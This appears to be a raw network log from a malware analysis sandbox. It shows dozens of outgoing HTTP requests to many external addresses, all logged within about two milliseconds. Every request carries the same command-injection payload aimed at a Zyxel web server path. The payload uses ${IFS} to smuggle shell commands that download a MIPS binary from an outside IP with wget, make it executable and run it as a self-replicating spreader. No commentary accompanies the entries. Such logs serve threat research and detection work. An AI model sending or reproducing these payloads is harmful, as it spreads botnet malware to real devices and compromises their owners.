                                                Jan 12, 2024 18:16:42.918833017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9407192.168.2.2345426167.229.104.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918873072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9408192.168.2.2355910104.101.55.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918904066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9409192.168.2.233441686.152.98.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918948889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9410192.168.2.234444851.219.134.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918978930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9411192.168.2.2358994191.49.135.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919012070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9412192.168.2.233315037.24.83.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919049025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9413192.168.2.2344168216.238.190.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919095039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9414192.168.2.2360802184.164.31.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919123888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9415192.168.2.23596248.27.143.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919146061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9416192.168.2.23453681.84.148.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919178009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9417192.168.2.233294250.122.171.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919209003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9418192.168.2.2350600188.228.148.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919265032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9419192.168.2.235221251.82.73.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919290066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9420192.168.2.2333284175.200.239.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919333935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9421192.168.2.233431090.191.64.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919370890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9422192.168.2.233767434.205.131.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919410944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9423192.168.2.2342772187.78.50.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919433117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9424192.168.2.2337346187.167.64.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919475079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9425192.168.2.233573885.105.196.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919492960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9426192.168.2.234160886.32.206.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919564962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9427192.168.2.233299093.91.136.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919583082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9428192.168.2.233479453.227.139.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919591904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9429192.168.2.2354668221.161.131.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919651985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9430192.168.2.235496681.47.138.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919675112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9431192.168.2.2346260132.129.251.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919706106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9432192.168.2.233775082.1.53.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919751883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9433192.168.2.2339146169.77.102.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919791937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9434192.168.2.2341100220.169.49.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919841051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9435192.168.2.2351060166.136.254.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919864893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9436192.168.2.234864223.86.65.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919914961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9437192.168.2.2356072123.1.31.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919960976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9438192.168.2.2358636119.27.131.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.919972897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9439192.168.2.2351662123.231.0.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920007944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9440192.168.2.2352030208.88.90.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920061111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9441192.168.2.236046835.212.17.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920090914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9442192.168.2.2333810101.191.116.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920115948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9443192.168.2.2343026110.46.124.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920172930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9444192.168.2.234657494.102.187.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920216084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9445192.168.2.234729488.205.135.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920244932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9446192.168.2.2344340123.162.175.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920291901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9447192.168.2.2354532124.196.93.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920325994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9448192.168.2.2343014161.12.232.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920389891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9449192.168.2.234959478.135.92.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920418978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9450192.168.2.234801241.143.128.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920419931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9451192.168.2.233733888.204.26.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920483112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9452192.168.2.2345408140.115.127.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920520067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9453192.168.2.2334580182.76.223.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920557022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9454192.168.2.2350650114.140.183.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920593023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9455192.168.2.23409601.219.247.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920629025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9456192.168.2.2346716157.22.196.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920671940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9457192.168.2.2357634160.52.176.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920703888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9458192.168.2.2340720153.53.149.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920741081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9459192.168.2.235025084.221.65.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920768976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9460192.168.2.2334300166.84.207.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920819044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9461192.168.2.2357106107.160.63.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920838118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9462192.168.2.2345096149.192.43.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920885086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9463192.168.2.2345856129.90.229.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920926094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9464192.168.2.2336686192.181.61.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920962095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9465192.168.2.2337634101.178.105.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.920999050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9466192.168.2.234505037.34.150.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921039104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9467192.168.2.233817212.16.244.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921093941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9468192.168.2.2335502160.117.158.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.921097994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9469192.168.2.23481182.118.175.18443
                                                TimestampBytes transferredDirectionData
